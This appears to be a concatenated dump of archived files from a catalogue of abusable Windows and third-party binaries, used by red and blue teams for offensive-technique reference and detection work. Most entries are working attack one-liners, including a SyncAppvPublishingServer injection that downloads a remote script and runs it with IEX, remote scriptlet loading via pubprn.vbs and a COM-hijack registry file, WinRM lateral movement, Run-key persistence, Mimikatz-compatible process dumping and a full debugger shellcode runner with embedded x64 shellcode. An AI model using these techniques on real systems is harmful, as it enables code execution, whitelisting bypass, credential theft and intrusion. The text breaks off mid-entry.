https://twitter.com/harr0ey/status/975350238184697857 * https://twitter.com/bohops/status/975549525938135040 * Full path: * c:\windows\system32\Syssetup.dll * c:\windows\sysWOW64\Syssetup.dll * Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken (Execute), Matt harr0ey - @harr0ey (Execute), Jimmy - @bohops (COM Scriptlet) ================================================ FILE: Archive-Old-Version/OSLibraries/Url.dll.md ================================================ ## Url.dll * Functions: Execute ``` rundll32.exe url.dll,OpenURL "C:\\test\\calc.hta" Launch a HTML application payload by calling OpenURL. rundll32.exe url.dll,OpenURL "C:\\test\\calc.url" Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e Launch an executable payload by calling OpenURL. rundll32.exe url.dll,FileProtocolHandler calc.exe Launch an executable payload by calling FileProtocolHandler. rundll32.exe url.dll,FileProtocolHandler file:///C:/test/test.hta Launch a HTML application payload by calling FileProtocolHandler. rundll32 url.dll,FileProtocolHandler file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e Launch an executable payload by calling FileProtocolHandler. ``` * Resources: * https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/ * https://twitter.com/bohops/status/974043815655956481 * https://twitter.com/DissectMalware/status/995348436353470465 * https://twitter.com/yeyint_mth/status/997355558070927360 * https://twitter.com/Hexacorn/status/974063407321223168 * Full path: * c:\windows\system32\url.dll * c:\windows\sysWOW64\url.dll * Notes: Thanks to Jimmy - @bohops (OpenURL), Adam - @hexacorn (OpenURL), Malwrologist - @DissectMalware (FileProtocolHandler - HTA), r0lan - @yeyint_mth (Obfuscation) ================================================ FILE: Archive-Old-Version/OSLibraries/Zipfldr.dll.md ================================================ ## Zipfldr.dll * Functions: Execute ``` rundll32.exe zipfldr.dll,RouteTheCall calc.exe Launch an executable payload by calling RouteTheCall. rundll32.exe zipfldr.dll,RouteTheCall file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e Launch an executable payload by calling RouteTheCall. ``` * Resources: * https://twitter.com/moriarty_meng/status/977848311603380224 * https://twitter.com/bohops/status/997896811904929792 * Full path: * c:\windows\system32\zipfldr.dll * c:\windows\sysWOW64\zipfldr.dll * Notes: Thanks to Moriarty - @moriarty_meng (Execute), r0lan - @yeyint_mth (Obfuscation) ================================================ FILE: Archive-Old-Version/OSScripts/CL_Invocation.ps1.md ================================================ ## CL_Invocation.ps1 * Functions: Execute ``` . C:\\Windows\\diagnostics\\system\\AERO\\CL_Invocation.ps1 \nSyncInvoke [args] Import the PowerShell Diagnostic CL_Invocation script and call SyncInvoke to launch an executable. ``` * Resources: * https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/ * https://twitter.com/bohops/status/948548812561436672 * https://twitter.com/pabraeken/status/995107879345704961 * Full path: * C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1 * C:\Windows\diagnostics\system\Audio\CL_Invocation.ps1 * C:\Windows\diagnostics\system\WindowsUpdate\CL_Invocation.ps1 * Notes: Thanks to Jimmy - @bohops (Execute), Pierre-Alexandre Braeken - @pabraeken (Audio + WindowsUpdate Paths) ================================================ FILE: Archive-Old-Version/OSScripts/CL_Mutexverifiers.ps1.md ================================================ ## CL_Mutexverifiers.ps1 * Functions: Execute ``` . C:\Windows\diagnostics\system\AERO\CL_Mutexverifiers.ps1 runAfterCancelProcess calc.ps1 Import the PowerShell Diagnostic CL_Mutexverifiers script and call runAfterCancelProcess to launch an executable. ``` * Resources: * https://twitter.com/pabraeken/status/995111125447577600 * Full path: * C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1 * C:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1 * C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1 * Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken (Audio + WindowsUpdate) ================================================ FILE: Archive-Old-Version/OSScripts/Manage-bde.wsf.md ================================================ ## Manage-bde.wsf * Functions: Execute ``` set comspec=c:\windows\system32\calc.exe & cscript c:\windows\system32\manage-bde.wsf Set the comspec variable to another executable prior to calling manage-bde.wsf for execution. copy c:\users\person\evil.exe c:\users\public\manage-bde.exe & cd c:\users\public\ & cscript.exe c:\windows\system32\manage-bde.wsf Run the manage-bde.wsf script with a payload named manage-bde.exe in the same directory to run the payload file. ``` * Resources: * https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712 * https://twitter.com/bohops/status/980659399495741441 * Full path: * C:\Windows\System32\manage-bde.wsf * Notes: Thanks to Jimmy - @bophops (Comspec), Daniel Bohannon - @danielhbohannon (Path Hijack) ================================================ FILE: Archive-Old-Version/OSScripts/Payload/Pubprn_calc.sct ================================================ ================================================ FILE: Archive-Old-Version/OSScripts/Payload/Slmgr.reg ================================================ Windows Registry Editor Version 5.00 [HKEY_CURRENT_USER\Software\Classes\Scripting.Dictionary] @="" [HKEY_CURRENT_USER\Software\Classes\Scripting.Dictionary\CLSID] @="{00000001-0000-0000-0000-0000FEEDACDC}" [HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}] @="Scripting.Dictionary" [HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32] @="C:\\WINDOWS\\system32\\scrobj.dll" "ThreadingModel"="Apartment" [HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID] @="Scripting.Dictionary" [HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL] @="https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSScripts/Payload/Slmgr_calc.sct" [HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID] @="Scripting.Dictionary" ================================================ FILE: Archive-Old-Version/OSScripts/Payload/Slmgr_calc.sct ================================================ ================================================ FILE: Archive-Old-Version/OSScripts/Pubprn.vbs.md ================================================ ## Pubprn.vbs * Functions: Execute ``` pubprn.vbs 127.0.0.1 script:https://domain.com/folder/file.sct Set the 2nd variable with a Script COM moniker to perform Windows Script Host (WSH) Injection. ``` * Resources: * https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/ * https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology * https://github.com/enigma0x3/windows-operating-system-archaeology * Full path: * C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs * C:\Windows\SysWOW64\Printing_Admin_Scripts\en-US\pubprn.vbs * Notes: Thanks to Matt Nelson - @enigma0x3 ================================================ FILE: Archive-Old-Version/OSScripts/Slmgr.vbs.md ================================================ ## Slmgr.vbs * Functions: Execute ``` reg.exe import c:\path\to\Slmgr.reg & cscript.exe /b c:\windows\system32\slmgr.vbs Hijack the Scripting.Dictionary COM Object to execute remote scriptlet (SCT) code. ``` * Resources: * https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology * https://www.youtube.com/watch?v=3gz1QmiMhss * Full path: * c:\windows\system32\slmgr.vbs * c:\windows\sysWOW64\slmgr.vbs * Notes: Thanks to Matt Nelson - @enigma0x3, Casey Smith - @subTee ================================================ FILE: Archive-Old-Version/OSScripts/SyncAppvPublishingServer.vbs.md ================================================ ## SyncAppvPublishingServer.vbs * Functions: Execute ``` SyncAppvPublishingServer.vbs "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX" Inject PowerShell script code with the provided arguments ``` * Resources: * https://twitter.com/monoxgas/status/895045566090010624 * https://twitter.com/subTee/status/855738126882316288 * Full path: * C:\Windows\System32\SyncAppvPublishingServer.vbs * Notes: Thanks to Nick Landers - @monoxgas, Casey Smith - @subTee ================================================ FILE: Archive-Old-Version/OSScripts/Winrm.vbs.md ================================================ ## Winrm.vbs * Functions: Execute ``` reg.exe import c:\path\to\Slmgr.reg & winrm quickconfig Hijack the Scripting.Dictionary COM Object to execute remote scriptlet (SCT) code. winrm invoke Create wmicimv2/Win32_Process @{CommandLine="notepad.exe"} -r:http://target:5985 Lateral movement/Remote Command Execution via WMI Win32_Process class over the WinRM protocol. winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985 \nwinrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985 Lateral movement/Remote Command Execution via WMI Win32_Service class over the WinRM protocol. ``` * Resources: * https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology * https://www.youtube.com/watch?v=3gz1QmiMhss * https://github.com/enigma0x3/windows-operating-system-archaeology * https://redcanary.com/blog/lateral-movement-winrm-wmi/ * https://twitter.com/bohops/status/994405551751815170 * Full path: * C:\windows\system32\winrm.vbs * C:\windows\SysWOW64\winrm.vbs * Notes: Thanks to Matt Nelson - @enigma0x3 (Hijack), Casey Smith - @subtee (Hijack), Red Canary Company cc Tony Lambert - @redcanaryco (Win32_Process LM), Jimmy - @bohops (Win32_Service LM) ================================================ FILE: Archive-Old-Version/OSScripts/pester.bat.md ================================================ ## pester.bat * Functions: Execute code using Pester. The third parameter can be anything. The fourth is the payload. ``` Pester.bat [/help|?|-?|/?] "$null; notepad" Execute notepad ``` * Resources: * https://twitter.com/Oddvarmoe/status/993383596244258816 * https://github.com/api0cradle/LOLBAS/blob/master/OSScripts/pester.md * Full path: * c:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat * c:\Program Files\WindowsPowerShell\Modules\Pester\*\bin\Pester.bat * Notes: Thanks to Emin Atac - @p0w3rsh3ll ================================================ FILE: Archive-Old-Version/OtherBinaries/AcroRd32.exe.md ================================================ ## AcroRd32.exe * Functions: Execute ``` Replace C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe by your binary Hijack RdrCEF.exe with a payload executable to launch when opening Adobe ``` * Resources: * https://twitter.com/pabraeken/status/997997818362155008 * Full path: * C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ * Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken ================================================ FILE: Archive-Old-Version/OtherBinaries/Gpup.exe.md ================================================ ## Gpup.exe * Functions: Execute ``` Gpup.exe -w whatever -e c:\Windows\System32\calc.exe Execute another command through gpup.exe (Notepad++ binary). ``` * Resources: * https://twitter.com/pabraeken/status/997892519827558400 * Full path: * C:\Program Files (x86)\Notepad++\updater\gpup.exe * Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken ================================================ FILE: Archive-Old-Version/OtherBinaries/Nlnotes.exe.md ================================================ ## Nlnotes.exe * Functions: Execute ``` NLNOTES.EXE /authenticate "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass } Run PowerShell via LotusNotes. ``` * Resources: * https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f * https://twitter.com/HanseSecure/status/995578436059127808 * Full path: * C:\Program Files (x86)\IBM\Lotus\Notes\Notes.exe * Notes: Thanks to Daniel Bohannon - @danielhbohannon ================================================ FILE: Archive-Old-Version/OtherBinaries/Notes.exe.md ================================================ ## Notes.exe * Functions: Execute ``` Notes.exe "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass } Run PowerShell via LotusNotes. ``` * Resources: * https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f * https://twitter.com/HanseSecure/status/995578436059127808 * Full path: * C:\Program Files (x86)\IBM\Lotus\Notes\notes.exe * Notes: Thanks to Daniel Bohannon - @danielhbohannon ================================================ FILE: Archive-Old-Version/OtherBinaries/Nvudisp.exe.md ================================================ ## Nvudisp.exe * Functions: Execute, Copy, Add registry, Create shortcut, kill process ``` Nvudisp.exe System calc.exe Execute calc.exe as a subprocess. Nvudisp.exe Copy test.txt,test-2.txt Copy fila A to file B. Nvudisp.exe SetReg HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\malware=malware.exe Add/Edit a Registry key value. Nvudisp.exe CreateShortcut test.lnk,"Test","c:\windows\system32\calc.exe\","","c:\windows\system32\" Create shortcut file. Nvudisp.exe KillApp calculator.exe Kill a process. Nvudisp.exe Run foo Run process ``` * Resources: * http://sysadminconcombre.blogspot.ca/2018/04/run-system-commands-through-nvidia.html * Full path: * C:\windows\system32\nvuDisp.exe * Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken ================================================ FILE: Archive-Old-Version/OtherBinaries/Nvuhda6.exe.md ================================================ ## Nvuhda6.exe * Functions: Execute, Copy, Add registry, Create shortcut, kill process ``` nvuhda6.exe System calc.exe Execute calc.exe as a subprocess. nvuhda6.exe Copy test.txt,test-2.txt Copy fila A to file B. nvuhda6.exe SetReg HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\malware=malware.exe Add/Edit a Registry key value nvuhda6.exe CreateShortcut test.lnk,"Test","C:\Windows\System32\calc.exe","","C:\Windows\System32\" Create shortcut file. nvuhda6.exe KillApp calc.exe Kill a process. nvuhda6.exe Run foo Run process ``` * Resources: * http://www.hexacorn.com/blog/2017/11/10/reusigned-binaries-living-off-the-signed-land/ * Full path: * Missing * Notes: Thanks to Adam - @hexacorn ================================================ FILE: Archive-Old-Version/OtherBinaries/ROCCAT_Swarm.exe.md ================================================ ## ROCCAT_Swarm.exe * Functions: Execute ``` Replace ROCCAT_Swarm_Monitor.exe with your binary.exe Hijack ROCCAT_Swarm_Monitor.exe and launch payload when executing ROCCAT_Swarm.exe ``` * Resources: * https://twitter.com/pabraeken/status/994213164484001793 * Full path: * C:\Program Files (x86)\ROCCAT\ROCCAT Swarm\ * Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken ================================================ FILE: Archive-Old-Version/OtherBinaries/Setup.exe.md ================================================ ## Setup.exe * Functions: Execute ``` Run Setup.exe Hijack hpbcsiServiceMarshaller.exe and run Setup.exe to launch a payload. ``` * Resources: * https://twitter.com/pabraeken/status/994381620588236800 * Full path: * C:\LJ-Ent-700-color-MFP-M775-Full-Solution-15315 * Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken ================================================ FILE: Archive-Old-Version/OtherBinaries/Usbinst.exe.md ================================================ ## Usbinst.exe * Functions: Execute ``` Usbinst.exe InstallHinfSection "DefaultInstall 128 c:\temp\calc.inf" Execute calc.exe through DefaultInstall Section Directive in INF file. ``` * Resources: * https://twitter.com/pabraeken/status/993514357807108096 * Full path: * C:\Program Files (x86)\Citrix\ICA Client\Drivers64\Usbinst.exe * Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken ================================================ FILE: Archive-Old-Version/OtherBinaries/VBoxDrvInst.exe.md ================================================ ## VBoxDrvInst.exe * Functions: Persistence ``` VBoxDrvInst.exe driver executeinf c:\temp\calc.inf Set registry key-value for persistance via INF file call through VBoxDrvInst.exe ``` * Resources: * https://twitter.com/pabraeken/status/993497996179492864 * Full path: * C:\Program Files\Oracle\VirtualBox Guest Additions * Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken ================================================ FILE: Archive-Old-Version/OtherMSBinaries/Appvlp.exe.md ================================================ ## Appvlp.exe * Functions: Execute ``` AppVLP.exe \\webdav\calc.bat Executes calc.bat through AppVLP.exe AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)" Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command. AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')" Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command. ``` * Resources: * https://github.com/MoooKitty/Code-Execution * https://twitter.com/moo_hax/status/892388990686347264 * Full path: * C:\Program Files\Microsoft Office\root\client\appvlp.exe * C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe * Notes: Thanks to fab - @0rbz_ (No record), Will - @moo_hax (Code Execution) ================================================ FILE: Archive-Old-Version/OtherMSBinaries/Bginfo.exe.md ================================================ ## Bginfo.exe * Functions: Execute ``` bginfo.exe bginfo.bgi /popup /nolicprompt Execute VBscript code that is referenced within the bginfo.bgi file. "\\10.10.10.10\webdav\bginfo.exe" bginfo.bgi /popup /nolicprompt Execute bginfo.exe from a WebDAV server. "\\live.sysinternals.com\Tools\bginfo.exe" \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt This style of execution may not longer work due to patch. ``` * Resources: * https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/ * Full path: * No fixed path * Notes: Thanks to Oddvar Moe - @oddvarmoe ================================================ FILE: Archive-Old-Version/OtherMSBinaries/Cdb.exe.md ================================================ ## Cdb.exe * Functions: Execute ``` cdb.exe -cf x64_calc.wds -o notepad.exe Launch 64-bit shellcode from the x64_calc.wds file using cdb.exe. ``` * Resources: * http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html * https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options * https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda * Full path: * C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe * C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\cdb.exe * Notes: Thanks to Matt Graeber - @mattifestation ================================================ FILE: Archive-Old-Version/OtherMSBinaries/Dxcap.exe.md ================================================ ## Dxcap.exe * Functions: Execute ``` Dxcap.exe -c C:\Windows\System32\notepad.exe Launch notepad as a subprocess of Dxcap.exe ``` * Resources: * https://twitter.com/harr0ey/status/992008180904419328 * Full path: * c:\Windows\System32\dxcap.exe * c:\Windows\SysWOW64\dxcap.exe * Notes: Thanks to Matt harr0ey - @harr0ey ================================================ FILE: Archive-Old-Version/OtherMSBinaries/Mftrace.exe.md ================================================ ## Mftrace.exe * Functions: Execute ``` Mftrace.exe cmd.exe Launch cmd.exe as a subprocess of Mftrace.exe. Mftrace.exe powershell.exe Launch cmd.exe as a subprocess of Mftrace.exe. ``` * Resources: * https://twitter.com/0rbz_/status/988911181422186496 (Currently not accessible) * Full path: * C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x86 * C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x64 * C:\Program Files (x86)\Windows Kits\10\bin\x86 * C:\Program Files (x86)\Windows Kits\10\bin\x64 * Notes: Thanks to fabrizio - @0rbz_ ================================================ FILE: Archive-Old-Version/OtherMSBinaries/Msdeploy.exe.md ================================================ ## Msdeploy.exe * Functions: Execute ``` msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="c:\temp\calc.bat" Launch calc.bat via msdeploy.exe. ``` * Resources: * https://twitter.com/pabraeken/status/995837734379032576 * Full path: * C:\Program Files (x86)\IIS\Microsoft Web Deploy V3\msdeploy.exe * Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken ================================================ FILE: Archive-Old-Version/OtherMSBinaries/Payload/Cdb_calc.wds ================================================ $$ Save this to a file - e.g. x64_calc.wds $$ Example: launch this shellcode in a host notepad.exe process. $$ cdb.exe -cf x64_calc.wds -o notepad.exe $$ Allocate 272 bytes for the shellcode buffer $$ Save the address of the resulting RWX in the pseudo $t0 register .foreach /pS 5 ( register { .dvalloc 272 } ) { r @$t0 = register } $$ Copy each individual shellcode byte to the allocated RWX buffer $$ Note: The `eq` command could be used to save space, if desired. $$ Note: .readmem can be used to read a shellcode buffer too but $$ shellcode on disk will be subject to AV scanning. ;eb @$t0+00 FC;eb @$t0+01 48;eb @$t0+02 83;eb @$t0+03 E4 ;eb @$t0+04 F0;eb @$t0+05 E8;eb @$t0+06 C0;eb @$t0+07 00 ;eb @$t0+08 00;eb @$t0+09 00;eb @$t0+0A 41;eb @$t0+0B 51 ;eb @$t0+0C 41;eb @$t0+0D 50;eb @$t0+0E 52;eb @$t0+0F 51 ;eb @$t0+10 56;eb @$t0+11 48;eb @$t0+12 31;eb @$t0+13 D2 ;eb @$t0+14 65;eb @$t0+15 48;eb @$t0+16 8B;eb @$t0+17 52 ;eb @$t0+18 60;eb @$t0+19 48;eb @$t0+1A 8B;eb @$t0+1B 52 ;eb @$t0+1C 18;eb @$t0+1D 48;eb @$t0+1E 8B;eb @$t0+1F 52 ;eb @$t0+20 20;eb @$t0+21 48;eb @$t0+22 8B;eb @$t0+23 72 ;eb @$t0+24 50;eb @$t0+25 48;eb @$t0+26 0F;eb @$t0+27 B7 ;eb @$t0+28 4A;eb @$t0+29 4A;eb @$t0+2A 4D;eb @$t0+2B 31 ;eb @$t0+2C C9;eb @$t0+2D 48;eb @$t0+2E 31;eb @$t0+2F C0 ;eb @$t0+30 AC;eb @$t0+31 3C;eb @$t0+32 61;eb @$t0+33 7C ;eb @$t0+34 02;eb @$t0+35 2C;eb @$t0+36 20;eb @$t0+37 41 ;eb @$t0+38 C1;eb @$t0+39 C9;eb @$t0+3A 0D;eb @$t0+3B 41 ;eb @$t0+3C 01;eb @$t0+3D C1;eb @$t0+3E E2;eb @$t0+3F ED ;eb @$t0+40 52;eb @$t0+41 41;eb @$t0+42 51;eb @$t0+43 48 ;eb @$t0+44 8B;eb @$t0+45 52;eb @$t0+46 20;eb @$t0+47 8B ;eb @$t0+48 42;eb @$t0+49 3C;eb @$t0+4A 48;eb @$t0+4B 01 ;eb @$t0+4C D0;eb @$t0+4D 8B;eb @$t0+4E 80;eb @$t0+4F 88 ;eb @$t0+50 00;eb @$t0+51 00;eb @$t0+52 00;eb @$t0+53 48 ;eb @$t0+54 85;eb @$t0+55 C0;eb @$t0+56 74;eb @$t0+57 67 ;eb @$t0+58 48;eb @$t0+59 01;eb @$t0+5A D0;eb @$t0+5B 50 ;eb @$t0+5C 8B;eb @$t0+5D 48;eb @$t0+5E 18;eb @$t0+5F 44 ;eb @$t0+60 8B;eb @$t0+61 40;eb @$t0+62 20;eb @$t0+63 49 ;eb @$t0+64 01;eb @$t0+65 D0;eb @$t0+66 E3;eb @$t0+67 56 ;eb @$t0+68 48;eb @$t0+69 FF;eb @$t0+6A C9;eb @$t0+6B 41 ;eb @$t0+6C 8B;eb @$t0+6D 34;eb @$t0+6E 88;eb @$t0+6F 48 ;eb @$t0+70 01;eb @$t0+71 D6;eb @$t0+72 4D;eb @$t0+73 31 ;eb @$t0+74 C9;eb @$t0+75 48;eb @$t0+76 31;eb @$t0+77 C0 ;eb @$t0+78 AC;eb @$t0+79 41;eb @$t0+7A C1;eb @$t0+7B C9 ;eb @$t0+7C 0D;eb @$t0+7D 41;eb @$t0+7E 01;eb @$t0+7F C1 ;eb @$t0+80 38;eb @$t0+81 E0;eb @$t0+82 75;eb @$t0+83 F1 ;eb @$t0+84 4C;eb @$t0+85 03;eb @$t0+86 4C;eb @$t0+87 24 ;eb @$t0+88 08;eb @$t0+89 45;eb @$t0+8A 39;eb @$t0+8B D1 ;eb @$t0+8C 75;eb @$t0+8D D8;eb @$t0+8E 58;eb @$t0+8F 44 ;eb @$t0+90 8B;eb @$t0+91 40;eb @$t0+92 24;eb @$t0+93 49 ;eb @$t0+94 01;eb @$t0+95 D0;eb @$t0+96 66;eb @$t0+97 41 ;eb @$t0+98 8B;eb @$t0+99 0C;eb @$t0+9A 48;eb @$t0+9B 44 ;eb @$t0+9C 8B;eb @$t0+9D 40;eb @$t0+9E 1C;eb @$t0+9F 49 ;eb @$t0+A0 01;eb @$t0+A1 D0;eb @$t0+A2 41;eb @$t0+A3 8B ;eb @$t0+A4 04;eb @$t0+A5 88;eb @$t0+A6 48;eb @$t0+A7 01 ;eb @$t0+A8 D0;eb @$t0+A9 41;eb @$t0+AA 58;eb @$t0+AB 41 ;eb @$t0+AC 58;eb @$t0+AD 5E;eb @$t0+AE 59;eb @$t0+AF 5A ;eb @$t0+B0 41;eb @$t0+B1 58;eb @$t0+B2 41;eb @$t0+B3 59 ;eb @$t0+B4 41;eb @$t0+B5 5A;eb @$t0+B6 48;eb @$t0+B7 83 ;eb @$t0+B8 EC;eb @$t0+B9 20;eb @$t0+BA 41;eb @$t0+BB 52 ;eb @$t0+BC FF;eb @$t0+BD E0;eb @$t0+BE 58;eb @$t0+BF 41 ;eb @$t0+C0 59;eb @$t0+C1 5A;eb @$t0+C2 48;eb @$t0+C3 8B ;eb @$t0+C4 12;eb @$t0+C5 E9;eb @$t0+C6 57;eb @$t0+C7 FF ;eb @$t0+C8 FF;eb @$t0+C9 FF;eb @$t0+CA 5D;eb @$t0+CB 48 ;eb @$t0+CC BA;eb @$t0+CD 01;eb @$t0+CE 00;eb @$t0+CF 00 ;eb @$t0+D0 00;eb @$t0+D1 00;eb @$t0+D2 00;eb @$t0+D3 00 ;eb @$t0+D4 00;eb @$t0+D5 48;eb @$t0+D6 8D;eb @$t0+D7 8D ;eb @$t0+D8 01;eb @$t0+D9 01;eb @$t0+DA 00;eb @$t0+DB 00 ;eb @$t0+DC 41;eb @$t0+DD BA;eb @$t0+DE 31;eb @$t0+DF 8B ;eb @$t0+E0 6F;eb @$t0+E1 87;eb @$t0+E2 FF;eb @$t0+E3 D5 ;eb @$t0+E4 BB;eb @$t0+E5 E0;eb @$t0+E6 1D;eb @$t0+E7 2A ;eb @$t0+E8 0A;eb @$t0+E9 41;eb @$t0+EA BA;eb @$t0+EB A6 ;eb @$t0+EC 95;eb @$t0+ED BD;eb @$t0+EE 9D;eb @$t0+EF FF ;eb @$t0+F0 D5;eb @$t0+F1 48;eb @$t0+F2 83;eb @$t0+F3 C4 ;eb @$t0+F4 28;eb @$t0+F5 3C;eb @$t0+F6 06;eb @$t0+F7 7C ;eb @$t0+F8 0A;eb @$t0+F9 80;eb @$t0+FA FB;eb @$t0+FB E0 ;eb @$t0+FC 75;eb @$t0+FD 05;eb @$t0+FE BB;eb @$t0+FF 47 ;eb @$t0+100 13;eb @$t0+101 72;eb @$t0+102 6F;eb @$t0+103 6A ;eb @$t0+104 00;eb @$t0+105 59;eb @$t0+106 41;eb @$t0+107 89 ;eb @$t0+108 DA;eb @$t0+109 FF;eb @$t0+10A D5;eb @$t0+10B 63 ;eb @$t0+10C 61;eb @$t0+10D 6C;eb @$t0+10E 63;eb @$t0+10F 00 $$ Redirect execution to the shellcode buffer r @$ip=@$t0 $$ Continue program execution - i.e. execute the shellcode g $$ Continue program execution after hitting a breakpoint $$ upon starting calc.exe. This is specific to this shellcode. g $$ quit cdb.exe q ================================================ FILE: Archive-Old-Version/OtherMSBinaries/SQLToolsPS.exe.md ================================================ ## SQLToolsPS.exe * Functions: Execute, evade logging ``` SQLToolsPS.exe -noprofile -command Start-Process calc.exe Run PowerShell scripts and commands. ``` * Resources: * https://twitter.com/pabraeken/status/993298228840992768 * Full path: * C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe * Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken ================================================ FILE: Archive-Old-Version/OtherMSBinaries/Sqldumper.exe.md ================================================ ## Sqldumper.exe * Functions: Dump process ``` sqldumper.exe 464 0 0x0110 Dump process by PID and create a dump file (Appears to create a dump file called SQLDmprXXXX.mdmp). sqldumper.exe 540 0 0x01100:40 0x01100:40 flag will create a Mimikatz compatibile dump file. ``` * Resources: * https://twitter.com/countuponsec/status/910969424215232518 * https://twitter.com/countuponsec/status/910977826853068800 * https://support.microsoft.com/en-us/help/917825/how-to-use-the-sqldumper-exe-utility-to-generate-a-dump-file-in-sql-se * Full path: * C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe * C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis\AS OLEDB\140\SQLDumper.exe * Notes: Thanks to Luis Rocha - @countuponsec ================================================ FILE: Archive-Old-Version/OtherMSBinaries/Sqlps.exe.md ================================================ ## Sqlps.exe * Functions: Execute, evade logging ``` Sqlps.exe -noprofile Drop into a SQL Server PowerShell console without Module and ScriptBlock Logging. ``` * Resources: * https://twitter.com/bryon_/status/975835709587075072 * Full path: * C:\Program files (x86\Microsoft SQL Server\100\Tools\Binn\sqlps.exe * Notes: Thanks to Bryon - @bryon_ ================================================ FILE: Archive-Old-Version/OtherMSBinaries/Tracker.exe.md ================================================ ## Tracker.exe * Functions: Execute ``` Tracker.exe /d .\calc.dll /c C:\Windows\write.exe Use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions. ``` * Resources: * https://twitter.com/subTee/status/793151392185589760 * https://attack.mitre.org/wiki/Execution * Full path: * * Notes: Thanks to Casey Smith - @subTee ================================================ FILE: Archive-Old-Version/OtherMSBinaries/csi.exe.md ================================================ ## csi.exe * Functions: Execute ``` csi.exe file Use csi.exe to run unsigned C# code. ``` * Resources: * https://twitter.com/subTee/status/781208810723549188 * https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/ * Full path: * c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe * c:\Program Files (x86)\Microsoft Web Tools\Packages\Microsoft.Net.Compilers.X.Y.Z\tools\csi.exe * Notes: Thanks to Casey Smith - @subtee ================================================ FILE: Archive-Old-Version/OtherMSBinaries/dnx.exe.md ================================================ ## dnx.exe * Functions: Execute ``` dnx.exe consoleapp Execute C# code located in the consoleapp folder via 'Program.cs' and 'Project.json' (Note - Requires dependencies) ``` * Resources: * 